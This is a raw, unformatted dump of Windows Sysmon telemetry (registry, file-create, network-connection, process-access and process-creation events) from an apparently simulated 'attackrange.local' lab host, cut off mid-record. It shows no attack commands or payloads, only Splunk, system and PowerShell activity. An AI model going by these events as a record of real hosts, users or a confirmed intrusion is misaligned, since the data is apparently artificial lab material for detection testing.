14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a653-0xdadcd505) 13241300x800000000000000035341511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65c-0x3ca13d05) 23542300x800000000000000035341522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:12.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3086E0B4CD89FB58F1A80BA2DC6331D7,SHA256=457A0AB7DBDAB2AC3906DB84B8CAD27E47C5095BB41FB560979F7AB4BF2FB0CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:13.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=23EE350F45E66C145F276EF62A9A5AB1,SHA256=5290C0A1C6D449AFDE1D0A35332254F1A21717446527F93983FAE8B611FAC213,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:13.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8BDA411D7368183B508187C901091D0,SHA256=90FA2291C0975606D1D06722FCCF7790989A0DEA252E209BEE7A36B4C09D604A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:14.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF70B0A1C82BE7FDE508BD33C56E93F,SHA256=1F5C8988F81BF82DB4F1D933D40A2AA13C5FD339B0345F08535B0996EA1EFF48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:39.508{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52313-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035341525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:39.207{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52312-false10.0.1.12-8000- 23542300x800000000000000035341528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:15.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA24B7E28F919BBE52A1FE00BC5D697C,SHA256=1DD532DA2B5599484F8B95AD3572087AA339C113CF03A8331BC107D1B65878A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:16.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6324FF1F48E6693712484642D31103,SHA256=CBF4088DE166E6CA6F0419A651AE2939C5FA3B699E9D822C3798E4943C1D6233,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71D5-613B-12B4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-71D5-613B-12B4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.918{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71D5-613B-12B4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.898{B81B27B7-71D5-613B-12B4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66C589E178E0C203CB3899ECAD633900,SHA256=C9EBAE4A38AB9FD803DCC3DD73C7341F7256ACAE2581FEADC03EBD667746D92F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.534{B81B27B7-71D5-613B-11B4-03000000C801}64486492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71D5-613B-11B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71D5-613B-11B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.366{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71D5-613B-11B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:17.351{B81B27B7-71D5-613B-11B4-03000000C801}6448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.680{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=577CAF3B318D5177E35570E8A1CA3506,SHA256=B5800075C08275880F4AAC99F1313D3589D0F7B3986329A14EA1473E6ADD9FEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A3FCC9FE205BF78751C1773BC4202A3,SHA256=42D4589EAC3DD77DD5C0705DF7FAFE2C63AC9A43A6E2D7FC53A68B9C056E10E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=466D9E340C91539D4F7327B7822EAC05,SHA256=AB3C7FDDB42E06D6285329C24BA3A090EBFE9C47488E69EBBB2E1B72D801EA79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:18.333{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 